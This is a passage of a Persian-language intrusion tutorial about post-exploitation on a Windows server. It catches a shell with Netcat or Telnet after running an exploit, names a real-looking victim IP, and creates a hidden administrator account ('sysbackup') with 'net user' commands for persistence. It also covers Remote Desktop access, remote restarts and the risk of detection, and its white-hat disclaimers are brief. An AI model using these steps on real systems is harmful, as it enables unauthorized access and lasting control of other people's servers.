‫ﮐﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﮑﻲ ﺍﺯ ﺩﻭ ﺭﺍﻩ ﺯﻳﺮ ﺑﻪ ‪ Shell Account‬ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍﮐﻨﻴﺪ‬
‫ﺍﻟﻒ ‪ :‬ﻗﺒﻞ ﺍﺯ ﺍﺟﺮﺍﻱ ‪ Exploit‬ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ ‪ Netcat‬ﭘﻮﺭﺕ ‪ ۵۰۰۰‬ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ‬

‫ﺷﻨﻮﺩ ﺑﮕﺬﺍﺭﻳﺪ ﺍﻳﻦ ﻫﻤﺎﻥ ﭘﻮﺭﺗﻲ ﺍﺳﺖ ﮐﻪ ﺷﻤﺎ ﺩﺭ ﻫﻨﮕﺎﻡ ﺍﺟﺮﺍﻱ ‪ Explit‬ﺑﻪ ﻋﻨﻮﺍﻥ ‪BindPort‬‬
‫ﺍﻧﺘﺨﺎﺏ ﮐﺮﺩﻳﺪ ) ﺑﻪ ﺷﮑﻞ ﺑﺎﻻ ﺗﻮﺟﻪ ﮐﻨﻴﺪ (‪.‬‬
‫ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘﻮﺭﺕ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﻭﻟﻲ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻧﮑﺘﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﮐﻪ‬
‫ﺍﮔﺮ ﭘﻮﺭﺕ ﻫﺎﻱ ﻣﻌﺮﻭﻓﻲ ﻣﺜﻞ ‪ ۸۰‬ﻳﺎ ‪ ۲۳‬ﻳﺎ ﭘﻮﺭﺕ ﻫﺎﻳﻲ ﺭﺍ ﮐﻪ ﺑﻪ ﻃﻮﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ ﻳﮏ ﺳﺮﻱ‬
‫‪ Protocol‬ﻫﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﮐﻨﻨﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﮐﻨﻴﺪ ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﻫﺴﺖ ﮐﻪ ﺑﺎﻋﺚ ﺗﺪﺍﺧﻞ ﺩﺭ ﺍﺟﺮﺍﻱ‬
‫‪ Exploit‬ﺷﻮﺩ ﻭ ﺷﻤﺎ ﺑﺎ ﺷﮑﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﭘﺲ ﺑﻬﺘﺮ ﺍﺳﺖ ﭘﻮﺭﺕ ﻫﺎﻱ ﻏﻴﺮ ﻣﻌﻤﻮﻟﻲ ﻣﺜﻞ‬
‫‪ - ۶۶۶۹ –۴۴۴۴۴‬ﻳﺎ ﻫﺮ ﭘﻮﺭﺕ ﺩﻟﺨﻮﺍﻩ ﺩﻳﮕﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ‪.‬‬
‫ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﺪ ﻣﺸﺎﻫﺪﻩ ﮐﻨﻴﺪ ﮐﻪ ﭘﻮﺭﺕ ‪ ۵۰۰۰‬ﺑﻪ ﺣﺎﻟﺖ ﺷﻨﻮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﮐﻪ‬
‫ﺑﺎ ﺑﺮﮔﺸﺘﻦ ﺟﻮﺍﺏ ‪ Exploit‬ﺷﻞ ﺑﺮﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺯ ﺍﻳﻦ ﭘﻮﺭﺕ ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺳﻴﺴﺘﻢ ﻫﺪﻑ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﺪ‬
‫) ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺩﺭ ﺣﺎﻟﺖ ﺷﻨﻮﺩ ﺑﺮ ﺭﻭﻱ ﭘﻮﺭﺕ ‪(۵۰۰۰‬‬
‫ﺏ‪ :‬ﺭﺍﻩ ﺩﻭﻡ ﮐﻪ ﺧﻮﺩ ﻣﻦ ﺁﻥ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ Telnet‬ﻣﻲ ﺑﺎﺷﺪ ﺯﻳﺮﺍ ‪Telnet‬‬
‫ﺩﺍﺭﺍﻱ ﺳﺮﻋﺖ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ‪ Netcat‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺧﺎﺹ ﺍﺳﺖ‪ .‬ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ‬
‫ﺣﺎﻟﺖ )‪ VVV( very very verbos‬ﺩﺭ ‪ netcat‬ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ ‪ .‬ﺍﻧﺘﺨﺎﺏ ﻫﺮ ﻳﮏ ﺍﺯ ﺩﻭ ﺭﺍﻩ‬
‫ﺑﺎﻻ ﺑﻪ ﺧﻮﺩ ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ‪.‬‬
‫‪ :۳‬ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﻣﻦ ﺷﻞ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺑﺮﻧﺎﻣﻪ ‪ Telnet‬ﺑﻪ ﺩﺳﺖ ﮔﺮﻓﺘﻢ ﻭ ﺑﺎ ﺩﺳﺘﻮﺭ ‪ipconfig‬‬
‫ﻣﻄﻤﺌﻦ ﺷﺪﻡ ﮐﻪ ﻣﻦ ﺍﻻﻥ ﺩﺍﺭﺍﻱ ‪ ip‬ﺑﻪ ﺷﻤﺎﺭﻩ ‪ 217.218.13.173‬ﻫﺴﺘﻢ ﺩﺭ ﻭﺍﻗﻊ ﻣﻦ ﻳﮑﻲ ﺍﺯ‬
‫ﻳﻮﺯﺭ ﻫﺎﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺎ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺷﺪﻡ ‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﺑﺎ ﺯﺩﻥ‬
‫ﻳﮏ ﻣﻴﻞ ﺑﻪ ﻣﺪﻳﺮ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻭﺟﻮﺩ ﺍﻳﻦ ‪ Bug‬ﺑﺎﺧﺒﺮ ﮐﻨﻴﺪ‬
‫)ﮔﺮﻓﺘﻦ ‪ Shell‬ﺍﺯ ﻃﺰﻳﻖ ‪( Telnet‬‬
‫‪ :۴‬ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻘﺎﻟﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺩﺭ ﺩﺳﺖ ﺷﻤﺎﺳﺖ ﻭ ﺍﺯ ﻧﻈﺮ ﻋﻤﻠﻲ ﺍﻻﻥ ﻫﺮ ﮐﺎﺭﻱ ﻣﻲ ﺗﻮﺍﻧﻴﺪ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺍﺧﻼﻗﻲ ﻣﺤﺪﻭﺩﻳﺖ ﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺭﺩ ﻭ‬
‫ﺑﺪﻝ ﮐﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﺑﻪ ﻫﺪﻑ ﺍﺯ ﻃﺮﻳﻖ ‪ TFTP‬ﻳﺎ ﺑﺎ ‪ Snifff‬ﮐﺮﺩﻥ ﺩﺍﺩﻩ ﻫﺎ ﻭ ﻳﺎ ﻫﺮ ﮐﺎﺭ ﺩﻳﮕﺮﻱ ﺩﺭ‬
‫ﺍﻧﺠﺎﻡ ﺑﺪﻫﻴﺪ‪ .‬ﻭﻟﻲ ﻣﻦ ﺩﺭ ﺍﺩﺍﻣﻪ ﻓﻘﻂ ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﮐﺎﺭﺑﺮﺍﻥ ﻳﮏ ﺍﺯ ﮐﺎﺭﻫﻬﺎﻱ ﺭﺍ ﮐﻪ ﻣﻲ‬ ‫ﺳﺮﻭﺭ‬
‫ﺗﻮﺍﻧﻴﺪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﺍﻧﺠﺎﻡ ﺑﺪﻫﻴﺪ ﺑﻪ ﺷﻤﺎ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﻢ ﻭ ﺁﻥ ﺍﻳﺠﺎﺩ ﻳﮏ ﻛﺎﺭﺑﺮ ﺟﺪﻳﺪ ﺭﻭﻱ‬
‫ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺳﺖ ﮐﻪ ﺑﺮﺍﻱ ﺩﻓﻌﺎﺕ ﺑﻌﺪﻱ ﺑﺮﺍ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭ ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﺟﺮﺍﻱ ﻣﺠﺪﺩ‬
‫‪ Exploit‬ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻟﺒﺘﻪ ﺑﺎ ‪ netcat‬ﻫﻢ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﺪﻑ ﻳﮏ ‪ BackDoor‬ﺍﻳﺠﺎﺩ‬
‫ﮐﻨﻴﺪ ﺑﺎﺯ ﻫﻢ ﺗﮑﺮﺍﺭ ﻣﻲ ﮐﻨﻢ ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﺍﺯ ﻧﻔﻮﺫ ﻫﻤﻪ ﭼﻴﺰ ﺑﻪ ﺧﻮﺩ ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﻭﺍﻳﻦ ﺷﻤﺎ‬
‫ﻫﺴﺘﻴﺪ ﮐﻪ ﻧﻮﻉ ﻧﻔﻮﺫ ﺧﻮﺩﺗﺎﻥ ﺭﺍ ﺭﻭﻱ ﻫﺪﻑ ﮔﺴﺘﺮﺵ ﻣﻲ ﺩﻫﻴﺪ ‪.‬ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﺑﺎ ﺩﺳﺘﻮﺭ ‪net user‬‬
‫ﺍﮐﺎﻧﺖ ﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻣﺸﺎﻫﺪﻩ ﮐﻨﻴﺪ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﭘﺴﻮﻭﺭﺩ ﻳﮑﻲ ﺍﺯ ﻫﻤﻴﻦ ﺍﮐﺎﻧﺖ ﻫﺎ‬
‫ﺭﺍ ﺗﻐﻴﻴﺮ ﺑﺪﻫﻴﺪ ﻭﻟﻲ ﭘﺴﻮﻭﺭﺩ ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﮐﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ‪ Administrator‬ﻫﺴﺖ ﺭﺍ ﺗﻐﻴﻴﺮ ﻧﻤﻲ‬
‫ﺩﻫﻢ‪ .‬ﺍﮔﺮ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺩﺍﺷﺘﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺪﺕ ﺯﻳﺎﺩﻱ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﺪﻩ ﺑﻮﺩ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮﺍﺕ‬
‫ﻣﻨﺎﺳﺐ ﺍﺳﺖ‪.‬‬
‫)ﻧﻤﺎﻳﺶ ‪ Account‬ﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺑﺮ ﺭﻭﻱ ﻫﺪﻑ (‬
‫ﻭﻟﻲ ﻣﻦ ﻗﺼﺪ ﺩﺍﺭﻡ ﻳﮏ ﻳﻮﺯﺭ ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺍﻳﺠﺎﺩ ﮐﻨﻢ ﺑﺎ ﻧﺎﻡ ‪) sysbackup‬ﺑﻪ ﺷﮑﻞ‬
‫ﺯﻳﺮ ﺗﻮﺟﻪ ﮐﻨﻴﺪ ( ﺑﺎﺯ ﻫﻢ ﺗﻮﺟﻪ ﮐﻨﻴﺪ ﺍﮔﺮ ﻳﻮﺯﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﮐﻪ ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﺍﺯ ﺁﻥ ﺁﺳﺘﻔﺎﺩﻩ ﻧﻤﻲ‬
‫ﺷﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮ ﺭﻭﻱ ﻫﻤﺎﻥ ﮐﺎﺭ ﮐﻨﻴﺪ ‪.‬‬
‫)ﺍﺿﺎﻓﻪ ﮐﺮﺩﻥ ﻳﮏ ﺍﮐﺎﻧﺖ ﺟﺪﻳﺪ ﺑﻪ ﻧﺎﻡ ‪(sysbackup‬‬
‫ﺑﺎ ﺍﺟﺮﺍﻱ ﻣﺠﺪﺩ ﻓﺮﻣﺎﻥ ‪ net user‬ﻣﻴﺒﻴﻨﻴﺪ ﮐﻪ ‪ sysbackup‬ﺑﻪ ﻛﺎﺭﺑﺮ ﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﺷﺪ‬
‫)ﻣﺸﺎﻫﺪﻩ ﻣﺠﺪﺩ ﺍﮐﺎﻧﺖ ﻫﺎ(‬
‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﻩ ﺟﺰﻳﻴﺎﺕ ﺩﺭﺑﺎﺭﻩ ﻳﻮﺯﺭﻱ ﮐﻪ ﺳﺎﺧﺘﻴﻢ ﺍﺯ ﻓﺮﻣﺎﻥ ‪ net user sysbackup‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲ ﮐﻨﻴﻢ ﺑﻪ ﻗﺴﻤﺖ ‪ local Group memberships‬ﺗﻮﺟﻪ ﮐﻨﻴﺪ ﻣﺘﻮﺟﻪ ﻣﻲ ﺷﻮﻳﺪ ﻫﻨﻮﺯ ﺍﻳﻦ‬
‫ﻛﺎﺭﺑﺮ ﻳﮏ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﻧﻴﺴﺖ!‬
‫)ﻣﺸﺎﻫﺪﻩ ﺟﺰﻳﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﮐﺎﻧﺖ ﺍﻳﺠﺎﺩ ﺷﺪﻩ(‬
‫ﻣﻦ ﺑﺎ ﺩﺳﺘﻮﺭ ﻱ ﮐﻪ ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﻣﻴﺒﻴﻨﻴﺪ ‪ Sysbackup‬ﺭﺍ ﺑﻪ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺗﻐﻴﻴﺮ ﻣﻲ ﺩﻫﻢ‬
‫) ﺗﺒﺪﻳﻞ ﺍﮐﺎﻧﺖ ﺟﺪﻳﺪ ﺑﻪ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻤﻲ ‪(Administrator‬‬
‫ﺑﺎﺯ ﺍﺯ ‪ sysbackup‬ﺧﺼﻮﺻﻴﺎﺕ ﻣﻲ ﮔﻴﺮﻡ ﻭ ﺑﻪ ﺳﻄﺮ ‪ Local Group Memberships‬ﺗﻮﺟﻪ‬

‫ﮐﻨﻴﺪ ﻣﻲ ﺑﻴﻨﻴﺪ ﮐﻪ‬
‫ﺍﻻﻥ ‪ sysbackup‬ﻳﮏ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻤﻲ ﺍﺳﺖ‬
‫)ﻣﺸﺎﻫﺪﻩ ﻣﺠﺪﺩ ﺟﺰﻳﻴﺎﺕ ﻳﻮﺯﺭ ﺟﺪﻳﺪ (‬
‫ﻳﮏ ﭘﺴﻮﻭﺭﺩ ﻫﻢ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮ ﮔﻮﻧﻪ ﺳﻮ ﺍﺳﻨﻔﺎﺩﻩ ﺍﻱ ﺭﻭﻱ ﺍﻳﻦ ﻳﻮﺯﺭ ﺗﻌﺮﻳﻒ ﻣﻴﮑﻨﻢ‬
‫‪۱۲۳۴۵‬‬
‫) ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﭘﺴﻮﻭﺭﺩ ﺭﻭﻱ ﺍﮐﺎﻧﺖ (‬
‫ﺑﺎ ﺩﺳﺘﻮﺭ ‪ net start‬ﺳﺮﻭﻳﺲ ﻫﺎﻳﻲ ﮐﻪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﻫﺴﺖ ﺭﺍ ﺑﺒﻴﻨﻴﺪ ﺍﮔﺮ‬
‫‪Remote‬‬ ‫‪ Terminal Services‬ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﮐﺮﺩﻳﺪ ﺑﻌﺪﺍ ﻣﻴﺘﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ‬ ‫ﺳﺮﻭﻳﺲ‬
‫‪ Desktop Connection‬ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻣﺜﻞ ‪ Terminal Server & Client‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﮐﻨﻴﺪ ﺑﺮﻧﺎﻣﻪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺍﺯ ﺳﺎﻳﺖ ‪ Download.com‬ﺑﮕﻴﺮﻳﺪ‬
‫)ﻣﺸﺎﻫﺪﻩ ﻟﻴﺴﺖ ﺳﺮﻭﻳﺲ ﻫﺎﻱ ﺟﺎﺭﻱ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ‪ -‬ﺑﻪ ﺧﺼﻮﺹ ‪(Terminal Services‬‬
‫ﺍﮔﺮ ﺳﺮﻭﻳﺲ ‪ Terminal Service‬ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺩﺭ ﺣﺎﻟﺖ ‪ start‬ﻧﺒﻮﺩ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻋﻨﻮﺍﻥ‬
‫ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺭﺍ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﮐﻨﻴﺪ ﺗﺎ ﺩﺭ ﺩﻓﻌﺎﺕ ﺑﻌﺪﻱ ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﻭﺟﻮﺩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﮐﻪ ﺍﺯ ﻃﺮﻳﻖ ‪ remote Desktop Connection‬ﺑﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ﻭﺻﻞ ﺷﻮﻳﺪ‬
‫‪).‬ﺑﺮﺍﻱ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲ ﻫﺎ ﺑﻪ ﺯﻳﺮ ﺩﺳﺘﻮﺭﺍﺕ ﻓﺮﻣﺎﻥ ‪ Net‬ﻣﺮﺍﺟﻌﻪ ﮐﻨﻴﺪ ( ﺍﻟﺒﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣﻪ‬
‫ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻣﺜﻞ ‪ Terminal Server&Client‬ﻭ ‪ WinVnc32‬ﻧﻴﺰ ﺑﺮﺍﻱ ﻭﺻﻞ ﺷﺪﻥ ﺑﻪ ﺳﺮﻭﺭ‬
‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﮐﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﻦ ﺑﺮﺍﻱ ﺭﺍﺣﺘﻲ ﮐﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺧﻮﺩ ﻳﮑﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﺍﺧﻠﻲ‬
‫‪ Windows‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﻢ ‪.‬‬
‫ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﺍﺯ ‪ User name‬ﻭ ‪ Password‬ﺍﻱ ﮐﻪ ﺩﺭ ﻣﺮﺍﺣﻞ ﺑﺎﻻ ﺑﺎ ﻧﺤﻮﻩ ﻱ ﺍﻳﺠﺎﺩﺷﺎﻥ ﺁﺷﻨﺎ‬
‫ﺷﺪﻳﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﻴﻢ‪ .‬ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﺗﻨﻬﺎ ﺭﺍﻩ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﻣﺠﺪﺩ ﺑﻪ ﻳﮏ ﺳﻴﺴﺘﻢ ﻫﮏ ﺷﺪﻩ ﻧﻴﺴﺖ ﺑﻠﮑﻪ‬
‫ﺍﺯ ﺁﻧﺠﺎﻳﻲ ﮐﻪ ﺍﻳﻦ ﺭﻭﺵ ‪ User Friendly‬ﻫﺴﺖ ﻣﻦ ﺁﻥ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺜﺎﻝ ﺯﺩﻡ ﻫﻤﺎﻧﻄﻮﺭﻱ ﮐﻪ ﺩﺭ‬
‫ﺑﺎﻻ ﻫﻢ ﮔﻔﺘﻢ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﮏ ‪ BackDoor‬ﻫﻢ ﺩﺭ ﺳﻴﺴﺘﻢ ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﻫﻤﻮﻥ ﺳﻴﺴﺘﻢ‬
‫ﺑﺪﻭﻥ ﻧﻴﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ‪ Exploit‬ﻧﻔﻮﺫ ﮐﻨﻴﺪ‪.‬‬
‫)ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﻃﺮﻳﻖ ‪(Remote Desktop Connection‬‬
‫ﻭﺍﻳﻦ ﻫﻤﺎﻥ ﭼﻴﺰﻱ ﺍﺳﺖ ﮐﻪ ﺷﻤﺎ ﺍﻧﺘﻈﺎﺭ ﺑﻪ ﺩﺳﺖ ﺁﻭﺭﺩﻧﺶ ﺭﺍ ﺩﺍﺷﺘﻴﺪ ﻭ ﻣﻦ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻢ ﮐﻪ ﺷﻤﺎ‬
‫ﺩﺳﺖ ﺑﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺧﺮﺍﺑﮑﺎﺭﻱ ﻧﻤﻴﺰﻧﻴﺪ ﻭ ﻣﺎﻧﻨﺪ ﻫﻤﻪ ﻫﮑﺮﻫﺎﻱ ﮐﻼﻩ ﺳﻔﻴﺪ ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﺪﻳﺮ ﺁﻥ‬
‫ﺳﺎﻳﺖ ﺭﺍ ﺍﺯ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ‪ Bug‬ﺑﻪ ﺧﺼﻮﺹ ﺑﺎﺧﺒﺮ ﻣﻲ ﮐﻨﻴﺪ ﻭ ﺭﺍﻩ ﭘﭻ ﮐﺮﺩﻥ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍ‬
‫ﻫﻢ ﺑﻪ ﺁﻧﻬﺎ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﻴﺪ‬
‫) ﻭﺍﺭﺩ ﺷﺪﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﺍﺯ ﻃﺮﻳﻖ ‪(GUI‬‬
‫ﻧﮑﺘﻪ ﻣﻬﻢ‪:‬‬
‫ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﺣﺘﻲ ﺑﺎ ﺩﺍﺷﺘﻦ ‪ User‬ﻭ ‪ Password‬ﻧﻴﺰ ﻧﺘﻮﺍﻧﻴﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪﻑ‬
‫ﻭﺻﻞ ﺷﻮﻳﺪ ﺯﻳﺮﺍ ﺑﺎﻳﺪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ‪ Restart‬ﺷﻮﺩ ﺗﺎ ﺍﮐﺎﻧﺖ ﺗﺎﺯﻩ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺷﻤﺎ ﺩﺭ‬
‫ﭘﺮﻭﺳﻪ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺗﺎ ﺩﺭ ﺩﻓﻌﻪ ﺑﻌﺪﻱ ﺑﺘﻮﺍﻥ ﺍﺯ ﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ‬
‫ﻧﻴﺰ ﺍﺯ ‪ Remote Shutdown Dialog Windows‬ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﺳﭙﺲ ﺩﻭﺑﺎﺭﻩ ﺍﺯ ‪Remote‬‬
‫‪ Desktop connection‬ﺑﺮﺍﻱ ﻭﺻﻞ ﺷﺪﻥ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ‪.‬‬
‫ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻬﻲ ‪ Remote Shutdown Dialog‬ﮐﻪ ﺩﺭ ‪ Microsoft 2k/XP/2003Server‬ﺑﻪ‬

‫ﻃﻮﺭ ﺩﺍﺧﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺷﻤﺎ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﻫﺮ ﺳﻴﺴﺘﻤﻲ ﺭﺍ ﺑﺎ ﺩﺍﺷﺘﻦ ﺍﺟﺎﺯﻩ ﺳﻴﺴﺘﻤﻲ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ ‪ Shutdown‬ﻭ ‪ Logoff‬ﻭ‬
‫‪ Restart‬ﻧﻤﺎﻳﻴﺪ ‪.‬ﺍﻟﺒﺘﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﺭﻳﺴﮏ ﺧﻄﺮ ﻟﻮ ﺭﻓﺘﻦ ﻧﻔﻮﺫ ﺧﻮﺩ ﺭﺍ ﺑﭙﺬﻳﺮﻳﺪ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﮔﺮ ﺩﺭ‬
‫ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻧﻴﺰ ﺑﻌﺪ ﺍﺯ ‪ Restart‬ﮐﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﺑﺎﺯ ﻧﺘﻮﺍﻧﺴﻴﺪ ﺑﻪ ﺁﻥ ‪ Log in‬ﻧﻤﺎﻳﻴﺪ ﺍﻳﻦ‬
‫ﺍﺣﺘﻤﺎﻝ ﻣﻲ ﺭﻭﺩ ﮐﻪ ﺣﻤﻠﻪ ﺷﻤﺎ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﺍﮐﺎﻧﺖ ﺟﺪﻳﺪ ﺷﻤﺎ ‪ Disable‬ﻭ ﻳﺎ ﺣﺬﻑ ﺷﺪﻩ‬
